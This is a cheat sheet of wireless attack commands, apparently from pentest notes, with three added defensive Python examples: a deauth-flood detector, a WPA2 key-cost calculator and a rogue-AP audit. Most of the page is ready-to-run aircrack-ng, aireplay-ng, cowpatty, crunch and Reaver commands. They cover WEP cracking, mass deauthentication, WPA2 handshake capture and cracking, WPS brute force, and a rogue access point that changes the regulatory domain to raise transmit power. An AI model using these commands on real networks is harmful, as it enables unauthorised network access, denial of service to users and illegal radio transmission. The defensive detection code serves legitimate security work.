
802-11 Wireless

Getting Started

Confirming Airmon-ng Status

airmon-ng check kill

Enter monitor mode

airmon-ng start <interface>

Capture packets from a specific channel

airodump-ng mon0 --channel <channel>

Save airodump capture to file

airodump-ng -w <filename> mon0 --channel 6

Generate wireless traffic by injecting packets to gather IVs quickly

aireplay-ng -1 0 -e <SSID> -a <AP MAC> -h <Your MAC> mon0

  • -1 tells aireplay-ng to perform a fake authentication

  • 0 is the retransmission time in seconds

  • -e the ESSID (network name) of the access point

  • -a the BSSID (MAC address) of the access point

  • -h your MAC address (check it on your adapter)

  • mon0 the monitor-mode interface to use for the fake authentication

Generating IVs with the ARP Request Replay Attack

aireplay-ng -3 -b <AP MAC> -h <Your MAC> mon0

  • -3 performs the ARP request replay attack

WPA2

To crack WPA2 Wi-Fi we must capture the 4-way handshake. To learn more about the 4-way handshake, see:

https://www.wifi-professionals.com/2019/01/4-way-handshake

airodump-ng -c 6 --bssid <AP MAC> -w handshake mon0

  • -c channel to use

  • --bssid the BSSID (MAC address) of the access point

  • -w write the capture to the given filename prefix

To force a client to re-authenticate so we can capture the handshake, use the following:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> mon0

  • -0 means deauthentication

  • 1 is how many deauthentication packets to send

Once you have captured a handshake, you can run the cap file against a wordlist to crack the passphrase:

aircrack-ng -w passwordlist.txt -b <AP MAC> filename*.cap

WEP

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon

aireplay-ng -3 -b <AP MAC> -h <Attacker MAC> wlan0mon

ARP Replay

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> wlan0mon

aircrack-ng -0 <filename.cap>

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon

aireplay-ng -5 -b <AP MAC> -h <Attacker MAC> wlan0mon

packetforge-ng -0 -a <AP MAC> -h <Attacker MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <packet filename>

tcpdump -n -vvv -e -s0 -r <packet filename>

aireplay-ng -2 -r <packet filename> wlan0mon

aircrack-ng -0 <filename>

WPA PSK

airmon-ng start wlan0 <AP Channel>

airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon

aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0mon

aircrack-ng -0 -w <wordlist> <capture file>

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Deauth every client

aireplay-ng -0 5 -a <bssid> mon0
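What the two deauth commands above look like on the air, and how a wireless IDS catches them, as an added example that is not part of the original cheat sheet: `aireplay-ng -0` emits management frames of subtype 12 (deauthentication); with `-c` the receiver is one client, without it the receiver is the broadcast MAC so every client of the BSSID drops at once. The detector below parses the 802.11 MAC header of raw frames, keeps a sliding window per BSSID and alerts when the deauth/disassoc rate crosses a threshold. All frames, MAC addresses and timestamps are constructed for the demo; the `threshold` and `window` values are assumed tuning knobs.

```python
"""Deauthentication-flood detector over raw 802.11 management frames (added example)."""
from collections import defaultdict

MGMT_TYPE = 0           # frame-control type 0 = management
SUBTYPE_DISASSOC = 0xA  # management subtype 10
SUBTYPE_DEAUTH = 0xC    # management subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_to_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


def build_frame(ftype: int, subtype: int, dst: str, src: str, bssid: str, reason: int = 7) -> bytes:
    """Build a bare 802.11 frame (no radiotap header) for the demo.

    Frame Control byte 0: bits 0-1 version, 2-3 type, 4-7 subtype. Management
    frames carry receiver / transmitter / BSSID in addr1..addr3; deauth and
    disassoc bodies start with a 2-byte little-endian reason code.
    """
    fc = bytes([(subtype << 4) | (ftype << 2), 0x00])
    header = fc + b"\x00\x00" + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid) + b"\x00\x00"
    if ftype == MGMT_TYPE and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        return header + reason.to_bytes(2, "little")
    return header


def parse_frame(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3, reason_or_None)."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 MAC header")
    ftype = (frame[0] >> 2) & 0x3
    subtype = (frame[0] >> 4) & 0xF
    a1, a2, a3 = mac_to_str(frame[4:10]), mac_to_str(frame[10:16]), mac_to_str(frame[16:22])
    reason = None
    if ftype == MGMT_TYPE and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        reason = int.from_bytes(frame[24:26], "little")
    return ftype, subtype, a1, a2, a3, reason


def detect_deauth_flood(events, threshold: int = 5, window: float = 10.0):
    """events: iterable of (timestamp_seconds, frame_bytes) in time order.

    Alerts when `threshold` or more deauth/disassoc frames name the same BSSID
    within `window` seconds. One alert per BSSID with the peak count and
    whether any frame was broadcast (the whole-cell variant).
    """
    recent = defaultdict(list)  # bssid -> [(ts, is_broadcast), ...] inside the window
    alerts = {}
    for ts, frame in events:
        ftype, subtype, a1, _a2, bssid, _reason = parse_frame(frame)
        if ftype != MGMT_TYPE or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        bucket = recent[bssid]
        bucket.append((ts, a1 == BROADCAST))
        while bucket and ts - bucket[0][0] > window:
            bucket.pop(0)
        if len(bucket) >= threshold:
            alerts[bssid] = {
                "bssid": bssid,
                "count": max(len(bucket), alerts.get(bssid, {}).get("count", 0)),
                "broadcast": any(bc for _, bc in bucket),
                "last_seen": ts,
            }
    return list(alerts.values())


def sample_events():
    """Constructed capture: a broadcast deauth burst against one BSSID,
    ordinary data traffic, and one legitimate deauth from another AP."""
    ap = "00:11:22:33:44:55"        # constructed BSSID under attack
    other_ap = "66:77:88:99:aa:bb"  # constructed BSSID behaving normally
    client = "de:ad:be:ef:00:01"    # constructed client MAC
    events = []
    for i in range(6):  # six broadcast deauths within 2.5 seconds
        events.append((i * 0.5, build_frame(MGMT_TYPE, SUBTYPE_DEAUTH, BROADCAST, ap, ap)))
    events.append((3.0, build_frame(2, 0, ap, client, ap)))  # data frame (type 2), ignored
    events.append((4.0, build_frame(MGMT_TYPE, SUBTYPE_DEAUTH, client, other_ap, other_ap, reason=3)))
    return events


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_events()):
        print(f"ALERT deauth flood on {alert['bssid']}: {alert['count']} frames, broadcast={alert['broadcast']}")
```

A single deauth is normal (a client roaming or an AP shedding a stale association), so the detector keys on rate per BSSID rather than on the frame itself; broadcast receiver plus a burst is the signature of the second command above. Protected Management Frames (802.11w) is the mitigation: with PMF required, an AP and its clients discard unauthenticated deauth frames.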

Dictionary Attack

aircrack-ng -w passwords.lst capture-01.cap

Brute force Attack

crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap

CoWPAtty Attack

Wordlist mode:

cowpatty -r <Capture file> -f <wordlist> -2 -s <AP ESSID>

PMK mode:

genpmk -f <wordlist> -d <hash filename> -s <AP ESSID>

cowpatty -r <Capture file> -d <hash filename> -2 -s <AP ESSID>
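Why a captured 4-way handshake (WPA2 section above) can be attacked offline, and why genpmk's precomputed table (PMK mode just above) only serves one SSID, shown as an added example that is not from the original page. The passphrase never crosses the air: both sides derive PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) per IEEE 802.11i and prove possession in the handshake, so each guess costs one PBKDF2 and the SSID acts as the salt. The code derives the PMK, checks it against the standard's published test vector, and turns keyspace sizes into time-to-exhaust at an assumed guess rate (a placeholder figure; substitute your own measurement). The policy names and the 100,000 guesses per second figure are assumptions for illustration.

```python
"""WPA2-PSK key derivation and offline-guessing cost (added example)."""
import hashlib

YEAR_SECONDS = 365 * 24 * 3600


def pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key as defined by IEEE 802.11i: PBKDF2-HMAC-SHA1,
    SSID as salt, 4096 iterations, 256-bit output. The standard's own test
    vector is pmk("password", "IEEE") = f42c6fc5...9710a12e."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidates for a fixed-length passphrase over an alphabet."""
    return alphabet_size ** length


def seconds_to_exhaust(n_guesses: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given PBKDF2 rate."""
    return n_guesses / guesses_per_second


def policy_report(guesses_per_second: float) -> dict:
    """Years to exhaust each (assumed) passphrase policy at the given rate.
    The first row is the `crunch 8 8 0123456789` pipe on the page: 10^8 keys."""
    policies = {
        "8 digits": keyspace(10, 8),
        "8 lowercase letters": keyspace(26, 8),
        "12 mixed alphanumerics": keyspace(62, 12),
        "20 mixed alphanumerics and symbols": keyspace(94, 20),
    }
    return {name: seconds_to_exhaust(n, guesses_per_second) / YEAR_SECONDS
            for name, n in policies.items()}


def table_reusable(ssid_a: str, ssid_b: str, candidate: str) -> bool:
    """A genpmk-style table is keyed on the SSID salt: the same candidate yields
    a different PMK under a different SSID, so the table cannot be reused."""
    return pmk(candidate, ssid_a) == pmk(candidate, ssid_b)


if __name__ == "__main__":
    ASSUMED_RATE = 100_000.0  # guesses per second; placeholder, measure your own
    print("PMK(password, IEEE) =", pmk("password", "IEEE").hex())
    for name, years in policy_report(ASSUMED_RATE).items():
        print(f"{name:38} {years:.3e} years")
    print("table for 'CorpNet' reusable on 'CorpNet-5G':", table_reusable("CorpNet", "CorpNet-5G", "password"))
```

The takeaways for whoever owns the network: an 8-digit numeric PSK falls in minutes at any realistic rate, a long random passphrase does not, and a unique SSID forces any precomputed table to be built from scratch for that network. WPA3-SAE removes the offline path entirely, because the exchange no longer lets a capture be tested against guesses.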

Rogue Access Point Testing

--------------------------

# ifconfig wlan0 down

# iw reg set BO

# iwconfig wlan0 txpower 0

# ifconfig wlan0 up

# airmon-ng start wlan0

# airodump-ng --write capture mon0

ifconfig wlan1 down

iw reg set BO

ifconfig wlan1 up

iwconfig wlan1 channel 13

iwconfig wlan1 txpower 30

iwconfig wlan1 rate 11M auto
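The rogue-AP commands above change the regulatory domain to reach channel 13 and a higher transmit power; from the defender's side, the same airodump-ng survey the page writes with `--write capture` is the data for spotting such an access point. The following is an added example, not part of the original page: it parses the AP section of an airodump-ng CSV export, compares each BSSID advertising a managed ESSID against an inventory, and flags unknown BSSIDs (evil twins), open or WEP networks impersonating a protected ESSID, and channels outside the local regulatory domain. The CSV rows, the `INVENTORY` dictionary and the `ALLOWED_CHANNELS` set (1-11, as in the US 2.4 GHz band) are constructed assumptions for the demo; the column layout follows airodump-ng's CSV header.

```python
"""Rogue / evil-twin access point audit over an airodump-ng CSV export (added example)."""
import csv

# Constructed AP section in airodump-ng's CSV layout (a real file also has a
# "Station MAC" section after the blank line, which the parser stops at).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2020-01-01 10:00:00, 2020-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,    0,   0.  0.  0.  0,   7, CorpNet,
AA:BB:CC:00:00:02, 2020-01-01 10:00:00, 2020-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  110,    0,   0.  0.  0.  0,   7, CorpNet,
DE:AD:BE:EF:00:01, 2020-01-01 10:02:00, 2020-01-01 10:05:00, 13,  54, OPN,     ,    , -30,   90,    0,   0.  0.  0.  0,   7, CorpNet,
12:34:56:78:9A:BC, 2020-01-01 10:01:00, 2020-01-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -70,   50,    0,   0.  0.  0.  0,   9, GuestCafe,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2020-01-01 10:03:00, 2020-01-01 10:05:00, -45,   30, DE:AD:BE:EF:00:01, CorpNet
"""

# Assumed site policy: authorised BSSIDs per managed ESSID, and the channels
# the local regulatory domain permits (channels 1-11 here).
INVENTORY = {"CorpNet": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}}
ALLOWED_CHANNELS = set(range(1, 12))


def parse_airodump_aps(text: str):
    """Return the AP rows as dicts; stops at the blank line before the station section."""
    lines = text.splitlines()
    i = 0
    while i < len(lines) and not lines[i].strip():  # skip leading blank lines
        i += 1
    rows = []
    for line in lines[i:]:
        if not line.strip():
            break
        rows.append(line)
    reader = csv.reader(rows, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for rec in reader:
        rec = [f.strip() for f in rec]
        if len(rec) < len(header):
            continue  # malformed / truncated row
        d = dict(zip(header, rec))
        aps.append({
            "bssid": d["BSSID"].lower(),
            "channel": int(d["channel"]),
            "privacy": d["Privacy"],
            "essid": d["ESSID"],
            "power": int(d["Power"]),
        })
    return aps


def audit(aps, inventory, allowed_channels):
    """Flag evil twins, downgraded security on managed ESSIDs, and out-of-domain channels."""
    findings = []
    for ap in aps:
        if ap["essid"] in inventory:
            if ap["bssid"] not in inventory[ap["essid"]]:
                findings.append({"type": "unauthorized-bssid", **ap})
            if not ap["privacy"].startswith("WPA"):  # OPN or WEP pretending to be the corporate net
                findings.append({"type": "weak-security", **ap})
        if ap["channel"] not in allowed_channels:
            findings.append({"type": "out-of-domain-channel", **ap})
    return findings


if __name__ == "__main__":
    for f in audit(parse_airodump_aps(SAMPLE_CSV), INVENTORY, ALLOWED_CHANNELS):
        print(f"{f['type']:22} {f['bssid']} ch{f['channel']:<3} {f['privacy'] or '-':5} {f['essid']}")
```

In the constructed survey the strongest signal (-30 dBm) belongs to an open AP on channel 13 broadcasting the corporate ESSID, which is exactly the footprint the `txpower 30` / `channel 13` lines above produce. The station section, which this parser skips, is the next thing to read: a client of your own fleet associated to the flagged BSSID turns the finding into an incident.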

Reaver

------

airmon-ng start wlan0

airodump-ng wlan0

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1


Last updated 5 years ago